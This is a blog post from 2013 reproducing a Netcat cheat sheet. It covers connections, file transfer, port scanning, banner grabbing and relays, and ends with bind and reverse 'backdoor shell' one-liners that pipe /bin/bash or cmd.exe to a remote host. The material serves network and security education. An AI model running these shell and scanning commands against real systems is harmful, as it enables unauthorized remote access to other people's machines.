What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.

2013-07-20

Netcat Cheat Sheet


[Fundamentals]

1. Fundamental Netcat Client:
# nc [TargetIPaddr] [TargetPort]

Connect to an arbitrary port [TargetPort] at IP Address [TargetIPaddr]

2. Fundamental Netcat Listener:
# nc -l -p [LocalPort]

Create a Netcat listener on arbitrary local port [LocalPort]

# nc -lvk -p [LocalPort]

If you want to force Netcat to stay listening after one connection you can use the -k flag. Using the -v (verbose) flag will make Netcat output who is connecting (over stderr), this is good to know when using the -k flag because it is possible that there are different computers connecting to you.

Both the client and listener take input from STDIN, and print responses to STDOUT.

[File Transfer]

1. Push a file 
(1) Connect & Upload (Being a Netcat Client):
# nc [TargerIPaddr] [TargetPort] < [InFile]

Push the file [InFile] to IP address [TargetIPaddr] on port [TargetPort]

(2) Listen & Upload (Being a Netcat Listener):
# nc -l -p [LocalPort] < [InFile]

Listen on [LocalPort], prepare to push [InFile]

2. Pull a file 
(1) Listen & Download (Being a Netcat Listener):
# nc -l -w3 -p [LocalPort] > [OutFile]

Pull a file being pushed to you on local port [LocalPort] and store it in [OutFile], closing the connection after 3 seconds

(2) Connect & Download (Being a Netcat Client):
nc -w3 [TargerIPaddr] [TargetPort] > [OutFile]

Connect to IP address [TargetIPaddr] on port [TargetPort] and retrieve [OutFile]  closing the connection after 3 seconds

Adjust the wait time from 3 to any value of seconds that is ample tome to transfer the specified file.

[TCP Port Scanner]

1. Port scan an IP Adddress:
# nc -v -n -z -w1 [TargetIPaddr] [StartPort] - [EndPort]

Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n),without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1)

The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.

[TCP Banner Grabber]

1. Grab the banner of any TCP service running on an IP Address from Linux:
# echo "" | nc -v -n -w1 [TargetIPaddr] [StartPort] - [EndPort]

Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response.

Add -p [Port] to specify a source port. The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.


[Netcat Relays on Winodws]

To start, enter a temporary directory where we will be creating a series of .bat files:
C:\> cd C:\temp

1. Relay from a Netcat Listener to a Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc -l -p [LocalPort] -e relay.bat

Create a relay that will route packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]

2. Relay from Netcat Client to Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc [SourceIPaddr] [SourcePort] -e relay.bat

Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]

3. Relay from Netcat Listener to Netcat Listener:
C:\temp> echo nc -l -p [LocalPort2] > relay.bat
C:\temp> nc -l -p [LocalPort1] -e relay.bat

Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]

[Netcat Relays on Linux]

To start, enter a temporary directory and create a FIFO called backpipe:
# cd /tmp
# mknod backpipe p

mknod - make block or character special files
mknod [OPTION]... NAME TYPE [MAJOR MINOR]
TYPE p : create a FIFO

1. Relay from a Netcat Listener on a Netcat Client:
# nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe

0: STDIN, 1:STDOUT, 2:STDERR
tee - read from standard input and write to standard output and files
tee [OPTION]... [FILE]...

Create a relay that will route packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]

2. Relay from Netcat Client to Netcat Client:
# nc [SourceIPaddr] [SourcePort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe

Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [targetPort]

3. Relay from Netcat Listener to Netcat Listener:
# nc -l -p [LocalPort1] 0<backpipe | nc -l -p [LocaalPort2] | tee backpipe

Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]

[Backdoor Shells]

1. Listening backdoor shell on Linux:
# nc -l -p [LocalPort] -e /bin/bash

2. Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe

Create a shell on local port [LocalPort] that can then be connected to using a fundamental client

3. Reverse backdoor shell on Linux:
# nc [YourIPaddr] [YourPort] -e /bin/bash

4. Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [YourPort] -e cmd.exe

Create a reverse shell that will attempt to connect to [YourIPaddr] on port [YourPort]. This shell can then be captured using a fundamental listener.

1 comment:

  1. Keep up the educational work man ! I'm going to visit this blog more often.

    ReplyDelete